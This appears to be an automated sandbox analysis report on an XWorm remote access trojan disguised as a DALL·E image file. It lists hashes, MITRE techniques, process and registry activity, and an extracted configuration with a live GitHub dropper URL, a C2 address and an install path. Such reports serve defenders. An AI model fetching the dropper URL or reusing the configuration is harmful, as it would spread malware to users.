xworm | b1ec420d062e732f3bb0a742115ba1773cff5e9db9464a8975ffc25c1408962a

Analysis

max time kernel
1390s
max time network
1390s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
06/03/2025, 11:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DALL·E 2025-03-06 10.16.38 - A beautiful night scene celebrating Ramadan. In the foreground, a grou.webp
Size

392KB
MD5

c8247385db6781d657965411ecc8dce5
SHA1

64247b98218b509b2d703ebcdd07c1d783cded71
SHA256

b1ec420d062e732f3bb0a742115ba1773cff5e9db9464a8975ffc25c1408962a
SHA512

01641ea652f7ff20f7b24af83b62325c9763bce0ee77c7c44ddd1f36b39a3e05950be95c6c6a78a6bc3bde222727579a607f0f150df747a9d6bc5cfa1b38de66
SSDEEP

6144:3P3Gu5sYsrA0dkxswJlbA9Z8AkMRaTgvF0ocj/STZ/8J9vUpyKi+tmzLago4Na:3PXsYsrA04E9WAWfOT6J97esXagoL

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe

Extracted

Family

xworm

Version

5.0

10.0.0.2:9999

Mutex

cdhmwEW0NV7oheU1

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/1076-1264-0x0000000000940000-0x0000000000950000-memory.dmp	family_xworm
behavioral1/files/0x000300000002aaf2-1487.dat	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 12 IoCs

flow	pid	Process
74	1676	powershell.exe
75	1676	powershell.exe
102	2392	powershell.exe
103	2392	powershell.exe
106	1948	powershell.exe
107	1948	powershell.exe
117	3972	powershell.exe
118	3972	powershell.exe
120	420	powershell.exe
121	420	powershell.exe
124	2860	powershell.exe
125	2860	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
209	3388	chrome.exe

Executes dropped EXE 60 IoCs

pid	Process
1076	DarkStream.exe
2928	DarkStream.exe
4168	DarkStream.exe
3252	DarkStream.exe
1052	DarkStream.exe
3428	VSCodeUserSetup-x64-1.98.0.exe
2376	VSCodeUserSetup-x64-1.98.0.tmp
1384	Code.exe
888	Code.exe
1076	Code.exe
5396	Code.exe
5792	Code.exe
5800	Code.exe
5836	Code.exe
5360	Code.exe
5636	Code.exe
5788	code-tunnel.exe
1384	Code.exe
6068	Code.exe
2096	Code.exe
5624	Code.exe
5972	Code.exe
4080	Code.exe
3512	Code.exe
2036	Code.exe
3428	Code.exe
1884	code-tunnel.exe
5656	Code.exe
5960	Code.exe
3480	Code.exe
5132	Code.exe
2500	Code.exe
4160	Code.exe
3736	Code.exe
2728	Code.exe
4844	Code.exe
5540	Code.exe
5236	Code.exe
956	Code.exe
4496	Code.exe
4532	code-tunnel.exe
6304	Code.exe
6328	Code.exe
6356	Code.exe
6540	Code.exe
6840	Code.exe
5772	Code.exe
6260	Code.exe
6464	Code.exe
6456	Code.exe
6084	Code.exe
6940	Code.exe
6984	Code.exe
4240	Code.exe
3208	code-tunnel.exe
2792	Code.exe
4920	Code.exe
5256	Code.exe
5512	Code.exe
5784	Code.exe

Loads dropped DLL 64 IoCs

pid	Process
1384	Code.exe
888	Code.exe
1076	Code.exe
888	Code.exe
888	Code.exe
888	Code.exe
888	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
5396	Code.exe
5792	Code.exe
5800	Code.exe
5836	Code.exe
5360	Code.exe
5800	Code.exe
5636	Code.exe
1384	Code.exe
6068	Code.exe
2096	Code.exe
5624	Code.exe
1384	Code.exe
2096	Code.exe
2096	Code.exe
2096	Code.exe
2096	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
1384	Code.exe
5972	Code.exe
1384	Code.exe
4080	Code.exe
2036	Code.exe
3428	Code.exe
3512	Code.exe
3512	Code.exe
1384	Code.exe
3428	Code.exe
1384	Code.exe
5656	Code.exe
5960	Code.exe
3480	Code.exe
5132	Code.exe
5132	Code.exe
2500	Code.exe
4160	Code.exe
3736	Code.exe
2728	Code.exe
4844	Code.exe
4160	Code.exe
4160	Code.exe
2728	Code.exe
2728	Code.exe
2728	Code.exe
2728	Code.exe
5540	Code.exe
4160	Code.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5012	icacls.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
420	powershell.exe
2860	powershell.exe
1676	powershell.exe
2392	powershell.exe
1948	powershell.exe
3972	powershell.exe
2336	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

flow	ioc
160	raw.githubusercontent.com
172	raw.githubusercontent.com
173	raw.githubusercontent.com
174	raw.githubusercontent.com
3	discord.com
26	discord.com
136	raw.githubusercontent.com
171	raw.githubusercontent.com
207	discord.com
362	camo.githubusercontent.com
27	discord.com
159	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
186	api.ipify.org
273	api.ipify.org
46	ip-api.com
104	ip-api.com
115	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\WF.msc	mmc.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	Code.exe
File opened for modification	C:\Windows\SystemTemp	Code.exe
File opened for modification	C:\Windows\SystemTemp	Code.exe
File opened for modification	C:\Windows\SystemTemp	Code.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\VSCodeUserSetup-x64-1.98.0.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VSCodeUserSetup-x64-1.98.0.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VSCodeUserSetup-x64-1.98.0.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5656	Code.exe
3480	Code.exe
6328	Code.exe
6540	Code.exe
2792	Code.exe
5512	Code.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Code.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Code.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Code.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857335876672180"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.go\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" \"%1\""	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.jade	VSCodeUserSetup-x64-1.98.0.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Code.exe
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.gitconfig\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.mkdn\DefaultIcon	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.psgi	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.vue\ = "VUE Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.r\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.zsh\OpenWithProgids\VSCode.zsh	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.zsh\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.hh\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.json\DefaultIcon	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.scss\shell	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Code.exe
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.profile	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.bib\AppUserModelID = "Microsoft.VisualStudioCode"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.profile\shell\open	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.txt	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\vscode\ = "URL:vscode"	Code.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.hpp\ = "C++ Header Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.htm\OpenWithProgids	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.htm\shell	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.cfg\ = "Configuration Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.gitattributes\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.jav\AppUserModelID = "Microsoft.VisualStudioCode"	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.m\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\resources\\win32\\default.ico"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.svg\shell\open	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.svg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" \"%1\""	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.t\shell	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.bash_login\OpenWithProgids\VSCode.bash_login	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.hh\shell\open\Icon = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\""	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.jshintrc\shell	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.jshintrc\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" \"%1\""	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.jshtm\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.c\DefaultIcon	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.cc\AppUserModelID = "Microsoft.VisualStudioCode"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.groovy\shell\open	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.lua\DefaultIcon	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.mdtext\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.profile\shell	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.pm6\AppUserModelID = "Microsoft.VisualStudioCode"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\vscode	Code.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.txt\OpenWithProgids\VSCode.txt	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.clj	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.csx\ = "C# Script Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.diff\OpenWithProgids\VSCode.diff	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.gemspec\AppUserModelID = "Microsoft.VisualStudioCode"	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.markdown\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" \"%1\""	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.mkdn\ = "Markdown Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.mli\shell	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.ascx\OpenWithProgids	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.csx	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.js\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.npmignore\ = "NPM Ignore Source File"	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.t\OpenWithProgids	VSCodeUserSetup-x64-1.98.0.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.rst\shell\open\Icon = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\""	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\.xaml	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.xhtml\DefaultIcon	VSCodeUserSetup-x64-1.98.0.tmp
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.t\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Code.exe
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\VSCode.dtd\shell\open\command	VSCodeUserSetup-x64-1.98.0.tmp

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\VSCodeUserSetup-x64-1.98.0.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\chrome-extension-roblox-cookie-logger-main.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Image-logger-roblox-main.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Fake-img-logger-main.zip:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
3280	chrome.exe
3280	chrome.exe
1180	chrome.exe
1180	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1172	powershell.exe
1172	powershell.exe
1172	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
420	powershell.exe
420	powershell.exe
420	powershell.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
2376	VSCodeUserSetup-x64-1.98.0.tmp
2376	VSCodeUserSetup-x64-1.98.0.tmp
5132	Code.exe
5132	Code.exe
4920	msedge.exe
4920	msedge.exe
1444	msedge.exe
1444	msedge.exe
5776	identity_helper.exe
5776	identity_helper.exe
1540	LocalBridge.exe
1540	LocalBridge.exe
1540	LocalBridge.exe
1540	LocalBridge.exe
1540	LocalBridge.exe
1540	LocalBridge.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
376	mmc.exe
1384	Code.exe
4824	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs

pid	Process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	3280	chrome.exe
Token: SeCreatePagefilePrivilege	3280	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
